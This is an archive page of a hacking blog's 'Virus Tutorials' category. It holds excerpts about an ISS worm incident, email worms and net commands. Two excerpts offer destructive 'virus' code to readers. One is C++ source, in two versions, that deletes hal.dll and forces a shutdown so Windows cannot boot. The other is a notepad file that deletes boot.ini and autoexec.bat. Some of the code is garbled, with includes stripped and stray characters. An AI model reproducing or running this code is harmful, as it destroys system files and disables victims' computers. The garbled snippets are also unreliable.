Your Ad Here
Home » Archive

Articles in the Virus Tutorials Category

Bad Boy, Hacking Computer, Hacking News, Security, Virus Tutorials »

[28 Aug 2008 | 2 Comments | ]
Share

SAN FRANCISCO: NASA confirmed that a computer virus sneaked aboard the International Space Station only to be tossed into quarantine on July 25 by security software.
A “worm type” virus was found on laptop computers that astronauts use to send and receive email from the station by relaying messages through a mission control center in Texas, according to NASA spokesman Kelly Humphries on Wednesday.
The virus is reported to be malicious software that logs keystrokes in order to steal passwords or other sensitive data by sending the information to hackers via the …

Trojan Horse, Virus Tutorials »

[9 Jun 2008 | 11 Comments | ]
Share

Open a dos prompt we will only need a dos prompt , and windows xp…
-Basics-
Opening a dos prompt -> Go to start and then execute and write
cmd and press ok
Now insert this command: net
And you will get something like this
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
Ok in this tutorial we well use 3 …

Virus Tutorials »

[22 Dec 2007 | No Comment | ]
Share

People use e-mail more than any other application on the internet, but it can be a frustrating experience, with spam and especially e-mail worms filling our inboxes.
Worms can spread rapidly over computer networks, the traffic they create bringing those networks to a crawl. And worms can cause other damage, such as allowing unauthorized access to a computer network, or deleting or copying files.
What’s a worm?
A worm is a computer virus designed to copy itself, usually in large numbers, by using e-mail or other form of software to spread itself over …

Hacking Computer, Hardcore Hacking, Virus Tutorials »

[4 Dec 2007 | One Comment | ]
Share

This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.
Warning: Do not try this on your home computer.The Original Code:
Code:
#include#include
using namespace std;
int main(int argc, char *argv[]){std::remove(“C:\\windows\\system32\\hal.dll”); //PWNAGE TIMEsystem(“shutdown -s -r”);system(“PAUSE”);return EXIT_SUCCESS;}

A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:
Code:
#include#include
using namespace std;
int main(int argc, char *argv[]){std::remove(“%systemroot%\\system32\\hal.dll”); //PWNAGE TIMEsystem(“shutdown -s -r”);system(“PAUSE”);return EXIT_SUCCESS;}

The second version would be more useful during times when you do not know the …

Hacking Computer, Hacking Tutorials, Hardcore Hacking, Security, Virus Tutorials »

[4 Dec 2007 | 35 Comments | ]
Share

Yes Now it is possible for you to have your own virus. But before doing anything yourself first of all you need to read the whole article first. And let me remind you that any problem occurs after you do anything then you are solely responsible for what has happened and I will not be responsible.
First of all Open your notepad and type the following………
del c:\boot।ini c:\del autoexec.bat
Now Save as anyname.exe. Create this in C: drive
The only thing you need is Notepad.

Create a text file called TEST.txt(empty) in C:\
Now in …